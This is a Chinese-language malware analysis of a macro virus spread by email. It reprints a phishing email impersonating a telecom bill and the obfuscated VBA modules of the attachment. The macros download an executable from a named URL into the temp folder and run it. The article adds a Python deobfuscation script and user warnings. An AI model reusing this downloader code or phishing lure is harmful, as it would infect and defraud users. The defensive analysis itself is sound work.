技術(shù)分析:一款流行的VBA宏病毒
1.通過(guò)郵件傳播的宏病毒
近期流行的一個(gè)宏病毒通過(guò)郵件進(jìn)行傳播,捕捉到的一個(gè)樣本,其郵件頭如下:
郵件的內(nèi)容是這樣子的(為節(jié)省篇幅,省略號(hào)處省略部分內(nèi)容):
Your bill summary Account number: 24583 Invoice Number: 2398485 Bill date: July 201***mount: £17.50 How can I view my bills? Your Chess bill is ready and waiting for you online. To check out your deta=led bill, previous bills and any charges you've incurred since your last b=ll, just sign into My Account www.chesstelecom.com/myaccount Forgotten your sign in details? If you've forgotten your sign in details, no problem, you can reset these b= choosing http://www.chesstelecom.com/lost_password. Making payments is easy! If you want to make a credit or debit card payment you can do online by cho=sing http://www.chesstelecom.com/online_payment You don't need to do anything if you pay by direct debit, we will collect y=ur payment automatically on or after 30th June. If you pay by cheque, deta=ls of how to pay us are available on the invoice. Switch to Direct Debit today and you'll save at least £60.00 a year, s=mply call our dedicated team on 0844 770 6060. Anything else you'd like to know? ...... This e-mail has been sent from a Mailbox belonging to Chess Telecom, registered office Bridgford House, Heyes Lane, Alderley Edge, Cheshire, SK9=7JP. Registered in England, number 2797895. Its contents are confidential to the=20 intended recipient. If you receive in error, please notify Chess Telecom on +44 (0)800 019 8900 immediately quoting the name of the sender, the +email address to which it has been sent and then delete it; you may not rely on i=s contents nor copy/disclose it to anyone. Opinions, conclusions and statements of intent in this email are those of the sender and will not bind Chess Tel=com unless confirmed by an authorised representative independently of this mess=ge. We do not accept responsibility for viruses; you must scan for these. Please note that emails sent to and from Chess Telecom are routinely monitored for=20 record keeping, quality control and training purposes, to ensure regulatory=20 compliance and to prevent viruses and unauthorised use of our computer systems. Thank you for your co-operation. Quotations are subject to terms and conditions, exclude VAT and are subject to site survey. E&OE
上述郵件正文:描述內(nèi)容看起來(lái)相當(dāng)?shù)目煽浚锩娴碾娫?huà)號(hào)碼都是真實(shí)的,并且給出了具體的公司名稱(chēng)地址,而且這個(gè)公司還真是具體存在的,現(xiàn)在還不知道這個(gè)公司是否知道自己被人冒名干壞事兒了(有點(diǎn)繞口,但不是重點(diǎn)…),之所以這么逼真,只是惡意郵件發(fā)送者希望以此來(lái)降低受害者的防備意識(shí)。
2.提取宏代碼
我們主要分析的郵件的附件,通過(guò)Outlook的保存功能可以將郵件中的附件2015-07-Bill.docm保存出來(lái),我們分析需要用到一個(gè)工具OfficeMalScanner,可以到這里下載。
提取宏代碼的步驟如下:
2.1 解壓
OfficeMalScanner.exe 2015-07-Bill.docm inflate
解壓后將會(huì)默認(rèn)保存到C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DecompressedMsOfficeDocument目錄下面(WinXP SP3環(huán)境),解壓后的目錄大致如下:
│ [Content_Types].xml │ ├─docProps │ app.xml │ core.xml │ ├─word │ │ document.xml │ │ fontTable.xml │ │ settings.xml │ │ styles.xml │ │ vbaData.xml │ │ vbaProject.bin │ │ webSettings.xml │ │ │ ├─theme │ │ theme1.xml │ │ │ └─_rels │ document.xml.rels │ vbaProject.bin.rels │ └─_rels
上面的文檔目錄結(jié)構(gòu)中可以發(fā)現(xiàn)在word目錄下含有一個(gè)vbaProject.bin的文件,這就是宏文件代碼所在的地方,需要注意的是vbaProject名字是可以任意取的,并不一定就是vbaProject(為默認(rèn)的宏文件名字)。接下來(lái)從vbaProject.bin文件中提取宏代碼。
2.2 提取
OfficeMalScanner.exe vbaProject.bin info
默認(rèn)會(huì)在vbaProject.bin同目錄下生成一個(gè)文件夾VBAPROJECT.BIN-Macros,里面存放有vba宏代碼的各個(gè)模塊。本案例中所提取到的各個(gè)文件如下:
Module1
Module2
Module35
Module4
ThisDocument
上面的文件都是vb代碼,只不過(guò)去掉了后綴而已。接著的工作就是分析vb代碼,看一下具體做了什么。#p#
3.代碼分析
為了便于說(shuō)明,并沒(méi)有按照模塊的順序來(lái)說(shuō)明。
3.1 Module2代碼分析
Module2的代碼如下:
1 Attribute VB_Name = "Module2"
2
3 Function init()
4
5 Set thisfrm = Forms("main")
6
7 frmWidth = thisfrm.InsideWidth
8 frmHeight = thisfrm.InsideHeight
9
10 End Function
11 Public Function lLJrFk6pKsSYJ(L9QLFPTuZDwM As String)
12 L9QLFPTuZDwM = Replace(Replace(Replace(L9QLFPTuZDwM, Chr(60), ""), Chr(61), ""), Chr(59), "")
13 Set lLJrFk6pKsSYJ = CreateObject(L9QLFPTuZDwM)
14 End Function
15 Private Sub button_physical_inventory_Click()
16 On Error GoTo Err_button_physical_inventory_Click
17
18 strSQLWhere = Me.combo_department_name.Value
19 stDocName = "physical_inventory"
20 DoCmd.OpenReport stDocName, acPreview
21
22 Exit_button_physical_inventory_Click:
23 Exit Sub
24
25 Err_button_physical_inventory_Click:
26 MsgBox Err.Description
27 Resume Exit_button_physical_inventory_Click
28
29 End Sub
主要看[11-14]行代碼,如下:
Public Function lLJrFk6pKsSYJ(L9QLFPTuZDwM As String) L9QLFPTuZDwM = Replace(Replace(Replace(L9QLFPTuZDwM, Chr(60), ""), Chr(61), ""), Chr(59), "") Set lLJrFk6pKsSYJ = CreateObject(L9QLFPTuZDwM) End Function
函數(shù)中的主要語(yǔ)句Replace(Replace(Replace(L9QLFPTuZDwM, Chr(60), ""), Chr(61), ""), Chr(59), ""),其中的Chr(60),chr(61),Chr(59)分別對(duì)應(yīng)于<,=,;,這些就是被替換的字符,替換的字符是""(NULL,也就是刪除了原有字符)。
因此本模塊的主要功能,是提供一個(gè)解密函數(shù)lLJrFk6pKsSYJ(string),將string中的"<,=,;"刪除得到真正的字符串。
3.2 模塊Module1模塊分析
Module1的代碼如下:
1 Attribute VB_Name = "Module1"
2
3 Private Sub Form_Load()
4 Me.RecordSource = strSQLInventory
5
6 If Me.boxes > 0 Or Me.pieces > 0 Then
7 Me.total = (strInventoryCount * Me.boxes) + Me.pieces
8 Else
9 Me.total = Me.pieces
10 End If
11
12 End Sub
13
14 Private Sub boxes_LostFocus()
15 If Me.boxes > 0 Then
16 Me.total = strInventoryCount * Me.boxes
17 End If
18 End Sub
19
20 Public Function FlvXHsDrWT3aY(yXhBaz0XR As Variant, c7e410X3Qq As String)
21 Dim NLobhieCn4Xt: Set NLobhieCn4Xt = lLJrFk6pKsSYJ("A" & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & "e" & Chr(97) & Chr(59) & "m")
22
23 With NLobhieCn4Xt
24 .Type = 1
25 .Open
26 .write yXhBaz0XR
27 End With
28 NLobhieCn4Xt.savetofile c7e410X3Qq, 2
29 End Function
30 Private Sub pieces_LostFocus()
31 If Me.boxes > 0 Or Me.pieces > 0 Then
32 Me.total = (strInventoryCount * Me.boxes) + Me.pieces
33 Else
34 Me.total = Me.pieces
35 End If
36 End Sub
37
38 Private Sub btn_save_Click()
39 DoCmd.Save
40 End Sub
主要看[20-29]代碼段,如下:
Public Function FlvXHsDrWT3aY(yXhBaz0XR As Variant, c7e410X3Qq As String)
Dim NLobhieCn4Xt: Set NLobhieCn4Xt = lLJrFk6pKsSYJ("A" & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & "e" & Chr(97) & Chr(59) & "m")
With NLobhieCn4Xt
.Type = 1
.Open
.write yXhBaz0XR
End With
NLobhieCn4Xt.savetofile c7e410X3Qq, 2
End Function
主要提供一個(gè)函數(shù)FlvXHsDrWT3aY(yXhBaz0XR=字節(jié)數(shù)組,c7e410X3Qq=文件名),其語(yǔ)句為:
lLJrFk6pKsSYJ("A" & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & "e" & Chr(97) & Chr(59) & "m")
可以看到這里采用了Module2中的解密函數(shù)lLJrFk6pKsSYJ,對(duì)加密的字符串進(jìn)行解密后使用。我們已經(jīng)知道了lLJrFk6pKsSYJ函數(shù)的作用,因此手工解密后得到:
A <do;db=.St=r< e a; m
刪除其中的"空格 ; < =",得到真正的命令:Adodb.Stream。進(jìn)一步分析可以得到該函數(shù)的作用為:
采用adodb.stream流,將字節(jié)數(shù)組寫(xiě)入指定文件中。
稍后我將會(huì)提供一個(gè)Python腳本對(duì)這些命令進(jìn)行解密,還原出宏代碼的真正命令。#p#
3.3 Module4模塊分析
1 Attribute VB_Name = "Module4"
2
3 Public ctlWidth As Integer
4 Public ctlHeight As Integer
5 Public aDPbd2byZb As String
6 Public strSQLBase As String 'query base
7 Public objSearchForm As String 'require form name
8 Public objInputCode As String 'text field for product code entry
9 Public objInputName As String 'text field for product name entry
10 Public searchCode As String
11 Public searchName As String
12 Public colS1 As String 'column to search
13 Public colS2 As String 'column to search
14
15 Function search_records()
16
17 'check form controls if they have user input
18 If Not IsNull(Forms(objSearchForm).Controls(objInputCode)) Then
19 searchCode = Forms(objSearchForm).Controls(objInputCode)
20 Else
21 searchCode = ""
22 End If
23
24 If Not IsNull(Forms(objSearchForm).Controls(objInputName)) Then
25 searchName = Forms(objSearchForm).Controls(objInputName)
26 Else
27 searchName = ""
28 End If
29
30 'main search logic
31 If (searchCode = "" And searchName = "") Or (IsNull(searchCode) And IsNull(searchName)) Then
32 strSQLSearch = strSQLBase
33 ElseIf (Not IsNull(searchCode) = True) And (Not IsNull(searchName) = True) Then
34 strSQLSearch = strSQLBase & " WHERE " & colS1 & " LIKE '" & searchCode & "*' AND " & colS2 & " LIKE '*" & searchName & "*'"
35 ElseIf Not IsNull(searchCode) Then
36 strSQLSearch = strSQLBase & " WHERE " & colS1 & " LIKE '" & searchCode & "*'"
37 ElseIf Not IsNull(searchName) Then
38 strSQLSearch = strSQLBase & " WHERE " & colS2 & " LIKE '*" & searchName & "*'"
39 Else
40 MsgBox "Please provide details to search"
41 Exit Function
42 End If
43
44 Forms(objSearchForm).RecordSource = strSQLSearch
45
46 End Function
47 Function control_set_left(controlName As String)
48
49 thisfrm.Controls(controlName).Left = 720
50
51 End Function
52
53 Sub LWS8UPvw1QGKq()
54
'下載地址:Nrh1INh1S5hGed="http://laboaudio.com/4tf33w/w4t453.exe".
55 Nrh1INh1S5hGed = Chr(104) & Chr(116) & Chr(61) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(59) & Chr(47) & Chr(108) & Chr(97) & Chr(98) & Chr(111) & "a" & Chr(60) & Chr(117) & "d" & Chr(105) & Chr(111) & Chr(46) & Chr(61) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(52) & Chr(116) & Chr(102) & Chr(51) & Chr(51) & Chr(119) & Chr(47) & Chr(60) & Chr(119) & Chr(52) & Chr(116) & Chr(52) & Chr(53) & Chr(51) & Chr(46) & Chr(59) & "e" & Chr(61) & Chr(120) & Chr(101)
'下載方式:LhZitls7wPn=Microsoft.XMLHTTP
56 Set LhZitls7wPn = lLJrFk6pKsSYJ("M" & "i" & Chr(60) & Chr(99) & Chr(114) & Chr(111) & Chr(61) & "s" & Chr(111) & "f" & Chr(116) & ";" & Chr(46) & "X" & Chr(77) & Chr(60) & "L" & Chr(59) & Chr(72) & "T" & Chr(61) & Chr(84) & "P")
57
58 Nrh1INh1S5hGed = Replace(Replace(Replace(Nrh1INh1S5hGed, Chr(60), ""), Chr(61), ""), Chr(59), "")
'使用CallByName進(jìn)行下載:CallByName Microsoft.XMLHTTP Open http://laboaudio.com/4tf33w/w4t453.exe
59 CallByName LhZitls7wPn, Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
60 Nrh1INh1S5hGed _
61 , False
62
'vu2Wh85645xcP0=WScript.Shell
63 Set vu2Wh85645xcP0 = lLJrFk6pKsSYJ(Chr(87) & "<" & Chr(83) & "c" & Chr(61) & Chr(114) & "i" & Chr(112) & "t" & Chr(59) & Chr(46) & Chr(83) & "=" & Chr(104) & "e" & "<" & "l" & Chr(108))
64
'獲取查詢(xún)環(huán)境變量的句柄: GhbwRqU9OkbF=CallByName(WScript,Environmentrocess)
65 Set GhbwRqU9OkbF = CallByName(vu2Wh85645xcP0, Chr(69) & Chr(110) & "v" & Chr(105) & Chr(114) & Chr(111) & "n" & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & "r" & "o" & Chr(99) & "e" & Chr(115) & "s")
66
'取得臨時(shí)目錄的路徑:GhbwRqU9OkbF(TEMP)
67 SD3q5HdXxoiA = GhbwRqU9OkbF(Chr(84) & Chr(69) & Chr(77) & Chr(80))
68
'下載的惡意程序存放路徑:aDPbd2byZb=%TEMP%\fghgkbb.exe
69 aDPbd2byZb = SD3q5HdXxoiA & "\" & Chr(102) & Chr(103) & Chr(104) & Chr(103) & Chr(107) & Chr(98) & Chr(98) & Chr(46) & "e" & "x" & Chr(101)
70 Dim bvGEpxCVsZ() As Byte
71
'發(fā)送請(qǐng)求:CallByName Microsoft.XMLHTTP send VbMethod
72 CallByName LhZitls7wPn, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
'獲取響應(yīng)體:CallByName Microsoft.XMLHTTP responseBody VbGet
73 bvGEpxCVsZ = CallByName(LhZitls7wPn, "r" & "e" & Chr(115) & Chr(112) & Chr(111) & Chr(110) & Chr(115) & Chr(101) & Chr(66) & Chr(111) & Chr(100) & "y", VbGet)
'使用adodb.stream流,將bvGEpxCVsZ字節(jié)流寫(xiě)入到文件aDPbd2byZb中
'將字節(jié)數(shù)組bvGEpxCVsZ寫(xiě)入文件aDPbd2byZb'
'這里涉及到了模塊Module1中的函數(shù)FlvXHsDrWT3aY(字節(jié)數(shù)組,文件名)
74 FlvXHsDrWT3aY bvGEpxCVsZ, aDPbd2byZb
75 On Error GoTo OhXhZLRKh
76 a = 84 / 0
77 On Error GoTo 0
78
79 xrIvr6mOXvFG:
80 Exit Sub
81 OhXhZLRKh:
82 ENMD3t8EY4A ("UfBPGay4VPJi")
83 Resume xrIvr6mOXvFG
84 End Sub
85 Function control_set_right(controlName As String)
86
87 ctlWidth = thisfrm.Controls(controlName).Width
88 thisfrm.Controls(controlName).Left = frmWidth - ctlWidth - 720
89
90 End Function
91
92 Function control_set_center(controlName As String)
93
94 ctlWidth = thisfrm.Controls(controlName).Width
95 thisfrm.Controls(controlName).Left = (frmWidth / 2) - (ctlWidth / 2)
96
97
98 End Function
主要看[53-90]行,分析函數(shù)LWS8UPvw1QGKq的作用,為了了解這個(gè)函數(shù)到底干了什么,我們需要對(duì)其解密,上面的兩個(gè)模塊由于函數(shù)較短,可以進(jìn)行手工解密,然而由于這個(gè)模塊中要解密的太多,
手工解密顯然是一種繁瑣效率低下的方式,故給出如下Python代碼(Python3):
import sys
import io
import re
sys.stdout=io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')
def decryptstr(s):
cmd=''
cmdlst=s.strip().split('&')
pat=re.compile(r"Chr\([0-9]*\)")
for item in cmdlst:
if 'Chr' in item:
beg,end=item.find('('),item.find(')')
numstr=item[beg+1:end]
cmd+=chr(int(numstr))
else:
cmd+=item.replace('"','')
cmd=cmd.replace(' ','')
cmd=cmd.replace('=','')
cmd=cmd.replace(';','')
cmd=cmd.replace('<','')
print(cmd)
ss=input("Input String:")
while len(ss)!=0:
print(decryptstr(ss))
ss=input("Input String:")
代碼比較少也比較簡(jiǎn)單,就沒(méi)有寫(xiě)注釋了。用法看下圖就可以了:
;
Input String:后面粘貼上要解密的字符串,然后回車(chē)就可以得到解密后的字符串。
代碼中也加入了注釋?zhuān)斫膺@塊代碼應(yīng)該不難。可以知道該模塊從http://laboaudio.com/4tf33w/w4t453.exe下載得到惡意程序w4t453.exe,以fghgkbb.exe文件名保存到臨時(shí)目錄。
3.4 ThisDocument模塊分析
該模塊主要代碼如下(不像上面都給出了完整代碼,而是僅僅給出了核心代碼,如果希望查看完整代碼的,可以到文末下載附件):
Public Function ENMD3t8EY4A(Ka0YAlL82q As String) 'Shell.Application:創(chuàng)建了一個(gè)shell對(duì)象 Set CYgAH0pzCPj0eA = lLJrFk6pKsSYJ(Chr(83) & Chr(104) & "=" & Chr(101) & Chr(108) & Chr(59) & Chr(108) & Chr(60) & Chr(46) & Chr(65) & Chr(112) & Chr(59) & Chr(112) & Chr(108) & "i" & Chr(60) & "c" & "a" & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110)) With CYgAH0pzCPj0eA 'open(C:\DOCUME~1\USERNAME\LOCALS~1\Temp\fghgkbb.exe):啟動(dòng)惡意程序 .Open (aDPbd2byZb) End With End Function
也就是啟動(dòng)下載的惡意程序。
另外,還有一個(gè)Module35模塊,我沒(méi)有進(jìn)行說(shuō)明,因?yàn)镸odule35基本上沒(méi)有提供有用的信息,可以忽略,并不影響我們分析該宏的功能。
4.結(jié)論
至此,我們可以知道,該宏代碼通過(guò)郵件進(jìn)行傳播,當(dāng)用戶(hù)使用word打開(kāi)郵件中的附件,啟用宏代碼的時(shí)候,惡意代碼將會(huì)首先到http://laboaudio.com/4tf33w/下載w4t453.exe到受害者的臨時(shí)目錄,保存的名字為fghgkbb.exe,然后啟動(dòng)該惡意程序。這個(gè)時(shí)候用戶(hù)就中病毒了。
文末,還是提醒一下大家,對(duì)于陌生郵件,一定要慎重的打開(kāi),很多人對(duì)于郵件,什么都沒(méi)有想,就直接打開(kāi)郵件了。在本案例中是通過(guò)附件word中的宏代碼進(jìn)行感染,但是有的惡意程序直接在你打開(kāi)郵件的時(shí)候就感染上病毒了。
另外由于Office安全機(jī)制的提升,在Word2007版本以上,打開(kāi)一個(gè)有宏文件的文檔時(shí),會(huì)提示是否啟用,這個(gè)時(shí)候不要隨意選擇啟用(可能這看起來(lái)是廢話(huà),但是很多人下意識(shí)就去點(diǎn)擊了啟用)。
如果你希望自己親自分析一下,你可以到這里下載本案例中的郵件。解壓密碼為:freebuf
希望本文對(duì)信息安全行業(yè)的人員有所幫助。
